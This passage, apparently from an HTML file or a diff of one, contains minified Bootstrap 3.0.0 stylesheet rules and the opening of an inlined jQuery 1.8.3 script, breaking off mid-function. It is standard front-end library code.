transparent;border-radius:4px}.alert h4{margin-top:0;color:inherit}.alert .alert-link{font-weight:bold}.alert>p,.alert>ul{margin-bottom:0}.alert>p+p{margin-top:5px}.alert-dismissable{padding-right:35px}.alert-dismissable .close{position:relative;top:-2px;right:-21px;color:inherit}.alert-success{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.alert-success hr{border-top-color:#c9e2b3}.alert-success .alert-link{color:#356635}.alert-info{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.alert-info hr{border-top-color:#a6e1ec}.alert-info .alert-link{color:#2d6987}.alert-warning{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.alert-warning hr{border-top-color:#f8e5be}.alert-warning .alert-link{color:#a47e3c}.alert-danger{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.alert-danger hr{border-top-color:#e6c1c7}.alert-danger .alert-link{color:#953b39}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-moz-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:0 0}to{background-position:40px 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.progress{height:20px;margin-bottom:20px;overflow:hidden;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,0.1);box-shadow:inset 0 1px 2px rgba(0,0,0,0.1)}.progress-bar{float:left;width:0;height:100%;font-size:12px;color:#fff;text-align:center;background-color:#428bca;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);-webkit-transition:width .6s ease;transition:width .6s ease}.progress-striped .progress-bar{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-size:40px 40px}.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-moz-animation:progress-bar-stripes 2s linear infinite;-ms-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}.progress-bar-success{background-color:#5cb85c}.progress-striped .progress-bar-success{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-info{background-color:#5bc0de}.progress-striped .progress-bar-info{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-warning{background-color:#f0ad4e}.progress-striped .progress-bar-warning{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-danger{background-color:#d9534f}.progress-striped .progress-bar-danger{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.media,.media-body{overflow:hidden;zoom:1}.media,.media .media{margin-top:15px}.media:first-child{margin-top:0}.media-object{display:block}.media-heading{margin:0 0 5px}.media>.pull-left{margin-right:10px}.media>.pull-right{margin-left:10px}.media-list{padding-left:0;list-style:none}.list-group{padding-left:0;margin-bottom:20px}.list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}.list-group-item:first-child{border-top-right-radius:4px;border-top-left-radius:4px}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.list-group-item>.badge{float:right}.list-group-item>.badge+.badge{margin-right:5px}a.list-group-item{color:#555}a.list-group-item .list-group-item-heading{color:#333}a.list-group-item:hover,a.list-group-item:focus{text-decoration:none;background-color:#f5f5f5}.list-group-item.active,.list-group-item.active:hover,.list-group-item.active:focus{z-index:2;color:#fff;background-color:#428bca;border-color:#428bca}.list-group-item.active .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading{color:inherit}.list-group-item.active .list-group-item-text,.list-group-item.active:hover .list-group-item-text,.list-group-item.active:focus .list-group-item-text{color:#e1edf7}.list-group-item-heading{margin-top:0;margin-bottom:5px}.list-group-item-text{margin-bottom:0;line-height:1.3}.panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,0.05);box-shadow:0 1px 1px rgba(0,0,0,0.05)}.panel-body{padding:15px}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel>.list-group{margin-bottom:0}.panel>.list-group .list-group-item{border-width:1px 0}.panel>.list-group .list-group-item:first-child{border-top-right-radius:0;border-top-left-radius:0}.panel>.list-group .list-group-item:last-child{border-bottom:0}.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}.panel>.table{margin-bottom:0}.panel>.panel-body+.table{border-top:1px solid #ddd}.panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-right-radius:3px;border-top-left-radius:3px}.panel-title{margin-top:0;margin-bottom:0;font-size:16px}.panel-title>a{color:inherit}.panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel-group .panel{margin-bottom:0;overflow:hidden;border-radius:4px}.panel-group .panel+.panel{margin-top:5px}.panel-group .panel-heading{border-bottom:0}.panel-group .panel-heading+.panel-collapse .panel-body{border-top:1px solid #ddd}.panel-group .panel-footer{border-top:0}.panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}.panel-default{border-color:#ddd}.panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}.panel-default>.panel-heading+.panel-collapse .panel-body{border-top-color:#ddd}.panel-default>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#ddd}.panel-primary{border-color:#428bca}.panel-primary>.panel-heading{color:#fff;background-color:#428bca;border-color:#428bca}.panel-primary>.panel-heading+.panel-collapse .panel-body{border-top-color:#428bca}.panel-primary>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#428bca}.panel-success{border-color:#d6e9c6}.panel-success>.panel-heading{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.panel-success>.panel-heading+.panel-collapse .panel-body{border-top-color:#d6e9c6}.panel-success>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#d6e9c6}.panel-warning{border-color:#fbeed5}.panel-warning>.panel-heading{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.panel-warning>.panel-heading+.panel-collapse .panel-body{border-top-color:#fbeed5}.panel-warning>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#fbeed5}.panel-danger{border-color:#eed3d7}.panel-danger>.panel-heading{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.panel-danger>.panel-heading+.panel-collapse .panel-body{border-top-color:#eed3d7}.panel-danger>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#eed3d7}.panel-info{border-color:#bce8f1}.panel-info>.panel-heading{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.panel-info>.panel-heading+.panel-collapse .panel-body{border-top-color:#bce8f1}.panel-info>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#bce8f1}.well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);box-shadow:inset 0 1px 1px rgba(0,0,0,0.05)}.well blockquote{border-color:#ddd;border-color:rgba(0,0,0,0.15)}.well-lg{padding:24px;border-radius:6px}.well-sm{padding:9px;border-radius:3px}.close{float:right;font-size:21px;font-weight:bold;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:hover,.close:focus{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:transparent;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}body.modal-open,.modal-open .navbar-fixed-top,.modal-open .navbar-fixed-bottom{margin-right:15px}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{z-index:1050;width:auto;padding:10px;margin-right:auto;margin-left:auto}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,0.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,0.5);box-shadow:0 3px 9px rgba(0,0,0,0.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}@media screen and (min-width:768px){.modal-dialog{right:auto;left:50%;width:600px;padding-top:30px;padding-bottom:30px}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,0.5);box-shadow:0 5px 15px rgba(0,0,0,0.5)}}.tooltip{position:absolute;z-index:1030;display:block;font-size:12px;line-height:1.4;opacity:0;filter:alpha(opacity=0);visibility:visible}.tooltip.in{opacity:.9;filter:alpha(opacity=90)}.tooltip.top{padding:5px 0;margin-top:-3px}.tooltip.right{padding:0 5px;margin-left:3px}.tooltip.bottom{padding:5px 0;margin-top:3px}.tooltip.left{padding:0 5px;margin-left:-3px}.tooltip-inner{max-width:200px;padding:3px 8px;color:#fff;text-align:center;text-decoration:none;background-color:#000;border-radius:4px}.tooltip-arrow{position:absolute;width:0;height:0;border-color:transparent;border-style:solid}.tooltip.top .tooltip-arrow{bottom:0;left:50%;margin-left:-5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-left .tooltip-arrow{bottom:0;left:5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-right .tooltip-arrow{right:5px;bottom:0;border-top-color:#000;border-width:5px 5px 0}.tooltip.right .tooltip-arrow{top:50%;left:0;margin-top:-5px;border-right-color:#000;border-width:5px 5px 5px 0}.tooltip.left .tooltip-arrow{top:50%;right:0;margin-top:-5px;border-left-color:#000;border-width:5px 0 5px 5px}.tooltip.bottom .tooltip-arrow{top:0;left:50%;margin-left:-5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-left .tooltip-arrow{top:0;left:5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-right .tooltip-arrow{top:0;right:5px;border-bottom-color:#000;border-width:0 5px 5px}.popover{position:absolute;top:0;left:0;z-index:1010;display:none;max-width:276px;padding:1px;text-align:left;white-space:normal;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.2);border-radius:6px;-webkit-box-shadow:0 5px 10px rgba(0,0,0,0.2);box-shadow:0 5px 10px rgba(0,0,0,0.2);background-clip:padding-box}.popover.top{margin-top:-10px}.popover.right{margin-left:10px}.popover.bottom{margin-top:10px}.popover.left{margin-left:-10px}.popover-title{padding:8px 14px;margin:0;font-size:14px;font-weight:normal;line-height:18px;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-radius:5px 5px 0 0}.popover-content{padding:9px 14px}.popover .arrow,.popover .arrow:after{position:absolute;display:block;width:0;height:0;border-color:transparent;border-style:solid}.popover .arrow{border-width:11px}.popover .arrow:after{border-width:10px;content:""}.popover.top .arrow{bottom:-11px;left:50%;margin-left:-11px;border-top-color:#999;border-top-color:rgba(0,0,0,0.25);border-bottom-width:0}.popover.top .arrow:after{bottom:1px;margin-left:-10px;border-top-color:#fff;border-bottom-width:0;content:" "}.popover.right .arrow{top:50%;left:-11px;margin-top:-11px;border-right-color:#999;border-right-color:rgba(0,0,0,0.25);border-left-width:0}.popover.right .arrow:after{bottom:-10px;left:1px;border-right-color:#fff;border-left-width:0;content:" "}.popover.bottom .arrow{top:-11px;left:50%;margin-left:-11px;border-bottom-color:#999;border-bottom-color:rgba(0,0,0,0.25);border-top-width:0}.popover.bottom .arrow:after{top:1px;margin-left:-10px;border-bottom-color:#fff;border-top-width:0;content:" "}.popover.left .arrow{top:50%;right:-11px;margin-top:-11px;border-left-color:#999;border-left-color:rgba(0,0,0,0.25);border-right-width:0}.popover.left .arrow:after{right:1px;bottom:-10px;border-left-color:#fff;border-right-width:0;content:" "}.carousel{position:relative}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner>.item{position:relative;display:none;-webkit-transition:.6s ease-in-out left;transition:.6s ease-in-out left}.carousel-inner>.item>img,.carousel-inner>.item>a>img{display:block;height:auto;max-width:100%;line-height:1}.carousel-inner>.active,.carousel-inner>.next,.carousel-inner>.prev{display:block}.carousel-inner>.active{left:0}.carousel-inner>.next,.carousel-inner>.prev{position:absolute;top:0;width:100%}.carousel-inner>.next{left:100%}.carousel-inner>.prev{left:-100%}.carousel-inner>.next.left,.carousel-inner>.prev.right{left:0}.carousel-inner>.active.left{left:-100%}.carousel-inner>.active.right{left:100%}.carousel-control{position:absolute;top:0;bottom:0;left:0;width:15%;font-size:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6);opacity:.5;filter:alpha(opacity=50)}.carousel-control.left{background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.5)),to(rgba(0,0,0,0.0001)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.5) 0),color-stop(rgba(0,0,0,0.0001) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000',endColorstr='#00000000',GradientType=1)}.carousel-control.right{right:0;left:auto;background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.0001)),to(rgba(0,0,0,0.5)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.0001) 0),color-stop(rgba(0,0,0,0.5) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000',endColorstr='#80000000',GradientType=1)}.carousel-control:hover,.carousel-control:focus{color:#fff;text-decoration:none;opacity:.9;filter:alpha(opacity=90)}.carousel-control .icon-prev,.carousel-control .icon-next,.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right{position:absolute;top:50%;left:50%;z-index:5;display:inline-block}.carousel-control .icon-prev,.carousel-control .icon-next{width:20px;height:20px;margin-top:-10px;margin-left:-10px;font-family:serif}.carousel-control .icon-prev:before{content:'\2039'}.carousel-control .icon-next:before{content:'\203a'}.carousel-indicators{position:absolute;bottom:10px;left:50%;z-index:15;width:60%;padding-left:0;margin-left:-30%;text-align:center;list-style:none}.carousel-indicators li{display:inline-block;width:10px;height:10px;margin:1px;text-indent:-999px;cursor:pointer;border:1px solid #fff;border-radius:10px}.carousel-indicators .active{width:12px;height:12px;margin:0;background-color:#fff}.carousel-caption{position:absolute;right:15%;bottom:20px;left:15%;z-index:10;padding-top:20px;padding-bottom:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6)}.carousel-caption .btn{text-shadow:none}@media screen and (min-width:768px){.carousel-control .icon-prev,.carousel-control .icon-next{width:30px;height:30px;margin-top:-15px;margin-left:-15px;font-size:30px}.carousel-caption{right:20%;left:20%;padding-bottom:30px}.carousel-indicators{bottom:20px}}.clearfix:before,.clearfix:after{display:table;content:" "}.clearfix:after{clear:both}.pull-right{float:right!important}.pull-left{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.affix{position:fixed}@-ms-viewport{width:device-width}@media screen and (max-width:400px){@-ms-viewport{width:320px}}.hidden{display:none!important;visibility:hidden!important}.visible-xs{display:none!important}tr.visible-xs{display:none!important}th.visible-xs,td.visible-xs{display:none!important}@media(max-width:767px){.visible-xs{display:block!important}tr.visible-xs{display:table-row!important}th.visible-xs,td.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-xs.visible-sm{display:block!important}tr.visible-xs.visible-sm{display:table-row!important}th.visible-xs.visible-sm,td.visible-xs.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-xs.visible-md{display:block!important}tr.visible-xs.visible-md{display:table-row!important}th.visible-xs.visible-md,td.visible-xs.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-xs.visible-lg{display:block!important}tr.visible-xs.visible-lg{display:table-row!important}th.visible-xs.visible-lg,td.visible-xs.visible-lg{display:table-cell!important}}.visible-sm{display:none!important}tr.visible-sm{display:none!important}th.visible-sm,td.visible-sm{display:none!important}@media(max-width:767px){.visible-sm.visible-xs{display:block!important}tr.visible-sm.visible-xs{display:table-row!important}th.visible-sm.visible-xs,td.visible-sm.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-sm{display:block!important}tr.visible-sm{display:table-row!important}th.visible-sm,td.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-sm.visible-md{display:block!important}tr.visible-sm.visible-md{display:table-row!important}th.visible-sm.visible-md,td.visible-sm.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-sm.visible-lg{display:block!important}tr.visible-sm.visible-lg{display:table-row!important}th.visible-sm.visible-lg,td.visible-sm.visible-lg{display:table-cell!important}}.visible-md{display:none!important}tr.visible-md{display:none!important}th.visible-md,td.visible-md{display:none!important}@media(max-width:767px){.visible-md.visible-xs{display:block!important}tr.visible-md.visible-xs{display:table-row!important}th.visible-md.visible-xs,td.visible-md.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-md.visible-sm{display:block!important}tr.visible-md.visible-sm{display:table-row!important}th.visible-md.visible-sm,td.visible-md.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-md{display:block!important}tr.visible-md{display:table-row!important}th.visible-md,td.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-md.visible-lg{display:block!important}tr.visible-md.visible-lg{display:table-row!important}th.visible-md.visible-lg,td.visible-md.visible-lg{display:table-cell!important}}.visible-lg{display:none!important}tr.visible-lg{display:none!important}th.visible-lg,td.visible-lg{display:none!important}@media(max-width:767px){.visible-lg.visible-xs{display:block!important}tr.visible-lg.visible-xs{display:table-row!important}th.visible-lg.visible-xs,td.visible-lg.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-lg.visible-sm{display:block!important}tr.visible-lg.visible-sm{display:table-row!important}th.visible-lg.visible-sm,td.visible-lg.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-lg.visible-md{display:block!important}tr.visible-lg.visible-md{display:table-row!important}th.visible-lg.visible-md,td.visible-lg.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-lg{display:block!important}tr.visible-lg{display:table-row!important}th.visible-lg,td.visible-lg{display:table-cell!important}}.hidden-xs{display:block!important}tr.hidden-xs{display:table-row!important}th.hidden-xs,td.hidden-xs{display:table-cell!important}@media(max-width:767px){.hidden-xs{display:none!important}tr.hidden-xs{display:none!important}th.hidden-xs,td.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-xs.hidden-sm{display:none!important}tr.hidden-xs.hidden-sm{display:none!important}th.hidden-xs.hidden-sm,td.hidden-xs.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-xs.hidden-md{display:none!important}tr.hidden-xs.hidden-md{display:none!important}th.hidden-xs.hidden-md,td.hidden-xs.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-xs.hidden-lg{display:none!important}tr.hidden-xs.hidden-lg{display:none!important}th.hidden-xs.hidden-lg,td.hidden-xs.hidden-lg{display:none!important}}.hidden-sm{display:block!important}tr.hidden-sm{display:table-row!important}th.hidden-sm,td.hidden-sm{display:table-cell!important}@media(max-width:767px){.hidden-sm.hidden-xs{display:none!important}tr.hidden-sm.hidden-xs{display:none!important}th.hidden-sm.hidden-xs,td.hidden-sm.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-sm{display:none!important}tr.hidden-sm{display:none!important}th.hidden-sm,td.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-sm.hidden-md{display:none!important}tr.hidden-sm.hidden-md{display:none!important}th.hidden-sm.hidden-md,td.hidden-sm.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-sm.hidden-lg{display:none!important}tr.hidden-sm.hidden-lg{display:none!important}th.hidden-sm.hidden-lg,td.hidden-sm.hidden-lg{display:none!important}}.hidden-md{display:block!important}tr.hidden-md{display:table-row!important}th.hidden-md,td.hidden-md{display:table-cell!important}@media(max-width:767px){.hidden-md.hidden-xs{display:none!important}tr.hidden-md.hidden-xs{display:none!important}th.hidden-md.hidden-xs,td.hidden-md.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-md.hidden-sm{display:none!important}tr.hidden-md.hidden-sm{display:none!important}th.hidden-md.hidden-sm,td.hidden-md.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-md{display:none!important}tr.hidden-md{display:none!important}th.hidden-md,td.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-md.hidden-lg{display:none!important}tr.hidden-md.hidden-lg{display:none!important}th.hidden-md.hidden-lg,td.hidden-md.hidden-lg{display:none!important}}.hidden-lg{display:block!important}tr.hidden-lg{display:table-row!important}th.hidden-lg,td.hidden-lg{display:table-cell!important}@media(max-width:767px){.hidden-lg.hidden-xs{display:none!important}tr.hidden-lg.hidden-xs{display:none!important}th.hidden-lg.hidden-xs,td.hidden-lg.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-lg.hidden-sm{display:none!important}tr.hidden-lg.hidden-sm{display:none!important}th.hidden-lg.hidden-sm,td.hidden-lg.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-lg.hidden-md{display:none!important}tr.hidden-lg.hidden-md{display:none!important}th.hidden-lg.hidden-md,td.hidden-lg.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-lg{display:none!important}tr.hidden-lg{display:none!important}th.hidden-lg,td.hidden-lg{display:none!important}}.visible-print{display:none!important}tr.visible-print{display:none!important}th.visible-print,td.visible-print{display:none!important}@media print{.visible-print{display:block!important}tr.visible-print{display:table-row!important}th.visible-print,td.visible-print{display:table-cell!important}.hidden-print{display:none!important}tr.hidden-print{display:none!important}th.hidden-print,td.hidden-print{display:none!important}}</style><!-- END extlib/css/bootstrap-3.0.0.min.css -->
-<!-- START extlib/js/jquery-1.8.3.min.js -->
-<script type="text/javascript">/*! jQuery v1.8.3 jquery.com | jquery.org/license */
-(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t,r)}return v.grep(e,function(e,r){return v.inArray(e,t)>=0===n})}function lt(e){var t=ct.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function At(e,t){if(t.nodeType!==1||!v.hasData(e))return;var n,r,i,s=v._data(e),o=v._data(t,s),u=s.events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].length;r<i;r++)v.event.add(t,n,u[n][r])}o.data&&(o.data=v.extend({},o.data))}function Ot(e,t){var 